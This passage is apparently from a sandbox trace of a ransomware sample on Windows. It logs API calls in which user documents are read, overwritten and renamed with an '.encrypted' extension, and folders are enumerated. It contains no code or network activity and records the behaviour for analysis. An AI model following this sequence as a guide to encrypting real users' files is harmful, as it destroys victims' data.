nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx.encrypted", lpFilePart=0x0) returned 0x53 [0153.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0153.130] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\xfg7ocmuv.docx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c1bd8d0, ftCreationTime.dwHighDateTime=0x1d5e3a3, ftLastAccessTime.dwLowDateTime=0x1746b190, ftLastAccessTime.dwHighDateTime=0x1d5dce8, ftLastWriteTime.dwLowDateTime=0x423cdc40, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x146b0)) returned 1 [0153.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0153.130] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\xfg7ocmuv.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\xfg7OcMuV.docx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\xfg7ocmuv.docx.encrypted")) returned 1 [0153.132] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc", lpFilePart=0x0) returned 0x45 [0153.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0153.132] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\y79lk5.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.132] GetFileType (hFile=0x4d0) returned 0x1 [0153.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0153.132] GetFileType (hFile=0x4d0) returned 0x1 [0153.132] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0xf87 [0153.132] ReadFile (in: hFile=0x4d0, lpBuffer=0x2321b24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x2321b24*, lpNumberOfBytesRead=0x2ee854*=0xf87, lpOverlapped=0x0) returned 1 [0153.134] CloseHandle (hObject=0x4d0) returned 1 [0153.147] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0153.147] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0153.148] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc", lpFilePart=0x0) returned 0x45 [0153.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0153.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\y79lk5.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.148] GetFileType (hFile=0x4d0) returned 0x1 [0153.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0153.149] GetFileType (hFile=0x4d0) returned 0x1 [0153.149] WriteFile (in: hFile=0x4d0, lpBuffer=0x2374a5c*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x2ee818, lpOverlapped=0x0 | out: lpBuffer=0x2374a5c*, lpNumberOfBytesWritten=0x2ee818*=0xf90, lpOverlapped=0x0) returned 1 [0153.149] CloseHandle (hObject=0x4d0) returned 1 [0153.150] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc", lpFilePart=0x0) returned 0x45 [0153.150] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc.encrypted", lpFilePart=0x0) returned 0x4f [0153.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0153.150] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\y79lk5.doc"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5dc7a20, ftCreationTime.dwHighDateTime=0x1d5d807, ftLastAccessTime.dwLowDateTime=0x8d4ee710, ftLastAccessTime.dwHighDateTime=0x1d5e2a4, ftLastWriteTime.dwLowDateTime=0x423f3da0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xf90)) returned 1 [0153.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0153.151] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\y79lk5.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\Y79LK5.doc.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\y79lk5.doc.encrypted")) returned 1 [0153.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0153.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpFilePart=0x0) returned 0x30 [0153.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpFilePart=0x0) returned 0x31 [0153.152] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0153.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee87c) returned 1 [0153.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0153.160] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpFilePart=0x0) returned 0x33 [0153.160] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpFilePart=0x0) returned 0x34 [0153.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0153.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee87c) returned 1 [0153.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0153.162] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpFilePart=0x0) returned 0x31 [0153.162] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpFilePart=0x0) returned 0x32 [0153.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94e8e70 [0153.163] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.163] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.163] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0153.163] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0153.163] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0153.164] FindClose (in: hFindFile=0x94e8e70 | out: hFindFile=0x94e8e70) returned 1 [0153.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0153.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0153.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0153.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpFilePart=0x0) returned 0x31 [0153.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpFilePart=0x0) returned 0x32 [0153.164] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94e8e70 [0153.164] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.164] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.164] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0153.165] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0153.165] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.165] FindClose (in: hFindFile=0x94e8e70 | out: hFindFile=0x94e8e70) returned 1 [0153.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0153.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0153.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0153.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x3a [0153.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpFilePart=0x0) returned 0x3b [0153.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94e8e70 [0153.166] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.166] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0153.166] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.167] FindClose (in: hFindFile=0x94e8e70 | out: hFindFile=0x94e8e70) returned 1 [0153.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0153.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0153.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0153.167] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x3a [0153.167] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpFilePart=0x0) returned 0x3b [0153.167] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94e8e70 [0153.167] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.167] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0153.167] FindNextFileW (in: hFindFile=0x94e8e70, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0153.168] FindClose (in: hFindFile=0x94e8e70 | out: hFindFile=0x94e8e70) returned 1 [0153.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0153.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0153.168] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", nBufferLength=0x105, lpBuffer=0x2ee26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFilePart=0x0) returned 0x45 [0153.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0153.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x80000000, 